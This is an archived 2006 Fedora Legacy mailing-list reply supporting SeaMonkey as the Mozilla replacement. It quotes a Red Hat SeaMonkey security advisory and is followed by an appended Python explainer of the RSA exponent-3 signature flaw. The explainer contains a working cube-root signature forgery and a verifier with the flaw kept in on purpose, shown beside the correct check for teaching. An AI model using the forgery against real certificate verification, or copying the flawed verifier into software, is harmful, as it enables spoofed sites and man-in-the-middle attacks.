On Wednesday 08 November 2006 05:43, David Eisenstein wrote:
> Hello Fedora Legacy and Extras folks,
>
> This below RHEL advisory just came out, along with advisories like this
> for Thunderbird and for Firefox. We in Legacy need to get busy on
> these, because they are critical bugs, and we haven't updated any
> Firefox, Thunderbird, or SeaMonkey (er, Mozilla) packages in a LONG
> time.
>
> There are some old Bugzillas that had been open for RHL 7.3, RHL 9, FC
> 1, FC 2, and FC 3 for Mozilla. There has been a running discussion (and
> no action -- largely my fault -- sorry!) about how and whether we
> upgrade Mozilla to SeaMonkey so that SeaMonkey becomes a Mozilla
> replacement (Core) package rather than an Extras package on a Bugzilla
> ticket for SeaMonkey. The Bugzilla number is 209167:
> <https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=209167>.
>
> My understanding is that Michal Jaegermann (Fedora Legacy contributor)
> has done work on at least one or more previous versions of SeaMonkey,
> having created (FC4?) packages that should, once installed, act as a
> Mozilla replacement, not unlike what the RHEL packages mentioned in
> RHSA-2006-0734 do.
>
> The advantage of having SeaMonkey do this is that all other packages
> (such as yelp, epiphany, possibly others) will inherit the more secure
> code from SeaMonkey, since they tap into the shared-library (.so) files
> that SeaMonkey would be providing. My understanding then also would be
> that SeaMonkey is meant to be API compatible with Mozilla, so that other
> programs that depend on functions (or objects) in Mozilla's
> shared-library should continue to work okay, possibly without
> recompilation, but probably requiring recompilation and pushing to
> updates.
>
> Does anyone have any comments on how you wish the Legacy Project to
> approach this? I favor SeaMonkey as a Mozilla replacement, as it covers
> all vulnerabilities in packages that dynamically link to the shared
> libraries. But perhaps there are other ideas.
>
> Since Legacy Mozilla/Firefox/Thunderbird security bugs have been open
> since June (and not worked on), I also advocate that we in Legacy build
> SeaMonkey packages for *all* releases of Fedora Core that we have ever
> supported (since older releases were supported at that time) and RHL 7.3
> and RHL 9. Does anyone object to that?
>
> What say ye??
>

As an interested sidewalk superintendent, I'd say go with seamonkey since a lot of that stuff comes for free with it.

> Regards,
> David Eisenstein
>
>
> -------- Original Message --------
> Subject: [RHSA-2006:0734-01] Critical: seamonkey security update
> Date: Wed, 8 Nov 2006 04:48:59 -0500
> From: [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
>
> ---------------------------------------------------------------------
> Red Hat Security Advisory
>
> Synopsis: Critical: seamonkey security update
> Advisory ID: RHSA-2006:0734-01
> Advisory URL: https://rhn.redhat.com/errata/RHSA-2006-0734.html
> Issue date: 2006-11-08
> Updated on: 2006-11-08
> Product: Red Hat Enterprise Linux
> CVE Names: CVE-2006-5462 CVE-2006-5463 CVE-2006-5464
> CVE-2006-5747 CVE-2006-5748
> ---------------------------------------------------------------------
>
> 1. Summary:
>
> Updated seamonkey packages that fix several security bugs are now
> available for Red Hat Enterprise Linux 2.1, 3, and 4.
>
> This update has been rated as having critical security impact by the Red
> Hat Security Response Team.
>
> 2. Relevant releases/architectures:
>
> ... (RHEL 2.1, RHEL 3, RHEL 4) ...
>
> 3. Problem description:
>
> SeaMonkey is an open source Web browser, advanced email and newsgroup
> client, IRC chat client, and HTML editor.
>
> Several flaws were found in the way SeaMonkey processes certain malformed
> Javascript code. A malicious web page could cause the execution of
> Javascript code in such a way that could cause SeaMonkey to crash or
> execute arbitrary code as the user running SeaMonkey. (CVE-2006-5463,
> CVE-2006-5747, CVE-2006-5748)
>
> Several flaws were found in the way SeaMonkey renders web pages. A
> malicious web page could cause the browser to crash or possibly execute
> arbitrary code as the user running SeaMonkey. (CVE-2006-5464)
>
> A flaw was found in the way SeaMonkey verifies RSA signatures. For RSA
> keys with exponent 3 it is possible for an attacker to forge a signature
> that would be incorrectly verified by the NSS library. SeaMonkey as
> shipped trusts several root Certificate Authorities that use exponent 3.
> An attacker could have created a carefully crafted SSL certificate which
> would be incorrectly trusted when their site was visited by a victim. This
> flaw was previously thought to be fixed in SeaMonkey 1.0.5, however
> Ulrich Kuehn discovered the fix was incomplete (CVE-2006-5462)
>
> Users of SeaMonkey are advised to upgrade to these erratum packages,
> which contain SeaMonkey version 1.0.6 that corrects these issues.
>
> <<snip>>

-- 
Cheers, Gene
"There are four boxes to be used in defense of liberty:
soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
Yahoo.com and AOL/TW attorneys please note, additions to the above
message by Gene Heskett are:
Copyright 2006 by Maurice Eugene Heskett, all rights reserved.

--
fedora-legacy-list mailing list
fedora-legacy-list@redhat.com
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
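The exponent-3 signature flaw the advisory describes (CVE-2006-5462, the incomplete fix for Bleichenbacher's 2006 forgery) comes down to a PKCS#1 v1.5 verifier that parses the RSA-decrypted block from the left and never checks that the DigestInfo is the last thing in it. With e = 3 the attacker does not need the private key: build a block whose leading bytes are the expected padding and hash and whose tail is free, take an integer cube root, and the cube of that root still carries the right prefix (and is smaller than the modulus, so the modular reduction never happens). What follows is an added example written for this page, not code from the advisory, from NSS or from the mailing list. It assumes a freshly generated 2048-bit demo key with e = 3 (the key generation exists only to show the genuine path; the forgery itself uses nothing but n and e), a constructed message standing in for the to-be-signed certificate body, and SHA-1, since that is what the browsers of the period accepted. The lenient verifier even enforces the 8-byte minimum padding and still accepts the forgery; the strict verifier rebuilds the entire encoded block and compares every byte.

```python
import hashlib
import hmac
import random

# DER DigestInfo prefix for SHA-1 (AlgorithmIdentifier{sha1, NULL} + OCTET STRING header),
# per RFC 3447 section 9.2 note 1. T = prefix || SHA-1(msg) is 35 bytes long.
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")
_SMALL_PRIMES = (3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47)


def digest_info(msg: bytes) -> bytes:
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()


def emsa_pkcs1_v15_encode(msg: bytes, k: int) -> bytes:
    """Full k-byte encoded message: 00 01 FF..FF 00 T (RFC 3447 section 9.2)."""
    t = digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def _k(n: int) -> int:
    return (n.bit_length() + 7) // 8


def _decrypt_block(n: int, e: int, sig: bytes):
    k = _k(n)
    if len(sig) != k:
        return None
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")


def strict_verify(n: int, e: int, msg: bytes, sig: bytes) -> bool:
    """Correct check: rebuild the whole expected block and compare all k bytes."""
    em = _decrypt_block(n, e, sig)
    return em is not None and hmac.compare_digest(em, emsa_pkcs1_v15_encode(msg, _k(n)))


def lenient_verify(n: int, e: int, msg: bytes, sig: bytes) -> bool:
    """Flawed check in the style of the bug: walk the block from the left, stop after T."""
    em = _decrypt_block(n, e, sig)
    if em is None or em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:  # at least 8 bytes of FF, then the 00 separator
        return False
    i += 1
    t = digest_info(msg)
    # BUG: only the parsed bytes are compared; whatever follows T is silently ignored.
    return em[i:i + len(t)] == t


def icbrt(n: int) -> int:
    """floor(cbrt(n)) by integer Newton iteration from an upper bound."""
    if n < 2:
        return n
    x = 1 << ((n.bit_length() + 2) // 3)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y


def forge_e3(n: int, msg: bytes) -> bytes:
    """Bleichenbacher-style forgery for e = 3: needs only the public modulus."""
    k = _k(n)
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    room = k - len(head)                       # bytes the flawed verifier never looks at
    hi = int.from_bytes(head + b"\xff" * room, "big")
    s = icbrt(hi)                              # s**3 <= hi and hi - s**3 < 3*s*s + 3*s + 1
    em = (s ** 3).to_bytes(k, "big")
    if s ** 3 >= n or not em.startswith(head):  # fails only if the modulus is too small for this trick
        raise ValueError("modulus too small for a plain cube-root forgery")
    return s.to_bytes(k, "big")


def is_probable_prime(n: int, rng: random.Random, rounds: int = 8) -> bool:
    """Miller-Rabin, adequate for a demo key only; use a vetted library for real keys."""
    if n < 2 or n % 2 == 0:
        return n == 2
    for p in _SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def rsa_keygen_e3(bits: int, rng: random.Random):
    """Demo key with e = 3; primes are chosen with p % 3 == 2 so that 3 is invertible mod (p-1)(q-1)."""
    def gen_prime(b: int) -> int:
        while True:
            c = rng.getrandbits(b) | (3 << (b - 2)) | 1   # top two bits set: n is exactly `bits` long
            if c % 3 == 2 and is_probable_prime(c, rng):
                return c
    p, q = gen_prime(bits // 2), gen_prime(bits // 2)
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))


def sign(n: int, d: int, msg: bytes) -> bytes:
    k = _k(n)
    return pow(int.from_bytes(emsa_pkcs1_v15_encode(msg, k), "big"), d, n).to_bytes(k, "big")


def demo(seed: int = 2006) -> dict:
    rng = random.Random(seed)                   # deterministic demo key; never seed real key generation this way
    n, e, d = rsa_keygen_e3(2048, rng)
    msg = b"constructed stand-in for a TBSCertificate"   # constructed sample input
    genuine, forged = sign(n, d, msg), forge_e3(n, msg)
    return {
        "genuine_strict": strict_verify(n, e, msg, genuine),
        "genuine_lenient": lenient_verify(n, e, msg, genuine),
        "forged_strict": strict_verify(n, e, msg, forged),
        "forged_lenient": lenient_verify(n, e, msg, forged),
    }


if __name__ == "__main__":
    print(demo())
```

Running `demo()` returns genuine_strict and genuine_lenient True, forged_strict False and forged_lenient True. The line that matters is the last one of `strict_verify`: the fix is not to search for trailing bytes after T but to refuse anything other than the one exact encoding, which leaves no place for extra bytes at all, whether they sit after the DigestInfo or inside a part of its ASN.1 that a parser skips. The free space grows with the modulus, which is why the plain cube-root version works comfortably at 2048 bits and `forge_e3` refuses moduli where the prefix would not survive.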